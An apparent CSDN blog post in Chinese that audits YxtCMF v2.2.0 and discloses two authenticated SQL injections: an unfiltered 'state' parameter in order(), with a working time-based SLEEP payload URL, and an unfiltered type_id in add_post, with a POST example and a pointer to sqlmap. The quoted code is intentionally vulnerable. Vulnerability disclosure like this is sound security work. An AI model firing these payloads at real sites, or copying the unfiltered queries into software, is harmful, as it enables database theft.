对YxtCMF一次简单审计

一个小众的cms,下载地址:http://down.admin5.com/php/133101.html

YxtCMF v2.2.0是thinkphp+bootstrap为框架进行开发的网络学习平台系统,有两处注入,不过都是需要会员登陆

由于网站没有对注入进行防护,假如开启gpc都帮你关掉
/index.php


注入1:需要先登陆
缺陷代码:对传入的$state没有进行过滤
public function order(){
                $state=I("get.state");
                $user_id=sp_get_current_userid();
                $where=empty($state)?array("user_id = $user_id"):array("user_id = $user_id and state=$state");//对传入的$state没有进行过滤
                $count=$this->order_obj->where($where)->count();
                $page = $this->page($count, 10);
                $data=$this->order_obj->limit($page->firstRow . ',' . $page->listRows)->where($where)->select();
                $num=$this->order_obj->where(array('state'=>2,'user_id'=>$user_id))->count();
        $this->assign('num',$num);
        $this->assign('order',$data);
        $this->assign('state',$state);
                $this->assign("Page", $page->show('Admin'));
        $this->display(':order');
    }
http://127.0.0.1/yxtcmf/index.php?g=user&m=center&a=order&state=1) AND (SELECT * FROM (SELECT(SLEEP(5)))pror) AND (8565=8565



注入2:需要进行以下操作,登陆以后申请成为教师


没有过滤传过来的type_id
在application\Teacher\Controller\CenterController.class.php
虽然这里注释了add函数,但是没有对add_post进行注释。

function add_post(){
        if (IS_POST) {
                    $data = $this->course_obj->create();
                        $count=$this->course_obj->count();
                        $term_id=$_POST['type_id'];
                        $typedata=$this->coursetype_obj->where("term_id=$term_id")->find();//缺陷代码,没有过滤传过来的type_id。
        $teacherdata=M('application')->where(array('user_id'=>sp_get_current_userid()))->find();
                        $data['cs_teacher']=sp_get_current_userid();
                        $data['top_id']=$typedata['parent'];
                        $data['cs_picture']=$_POST['cs_picture'];
                        $data['labelid']=$_POST['labelid'];
                        $deta['notice']=$_POST['code'];
                        $deta['count']=$_POST['count'];
                                $data['cs_addtime']=date('Y-m-d H:i:s');
                        $data['cs_state']=1;
                        $data['cs_brief']=htmlspecialchars_decode($data['cs_brief']);
                        $data['course_type']=$_POST['type'];
                        $data['stu_numbers']=$_POST['stu_numbers'];
                        if($teacherdata['state']<1){
                                $this->error("您还未通过审核,暂时不能添加课程!");
                        }
                         
                if($deta['notice']=='sucess'){
                                if ($this->course_obj->add($data)) {
                                        $this->success("添加成功!",U("Teacher/Center/index"));
                                }else{
                                        $this->error("添加失败!");
                                }                        
                        }else{
                                if($count>=$deta['count']){
                                        $this->error($deta['notice']);
                                }else{
                                        if ($this->course_obj->add($data)) {
                                            $this->success("添加成功!",U("Teacher/Center/index"));
                                    }else{
                                           $this->error("添加失败!");
                                    }                        
                                }
                        }
                }
         
        }

http://172.16.9.31/yxtcmf/index.php?g=teacher&m=center&a=add_post

post:ty_id=1

由于没有做过滤,可以直接sqlmap跑出来





发布了20 篇原创文章 · 获赞 11 · 访问量 13万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览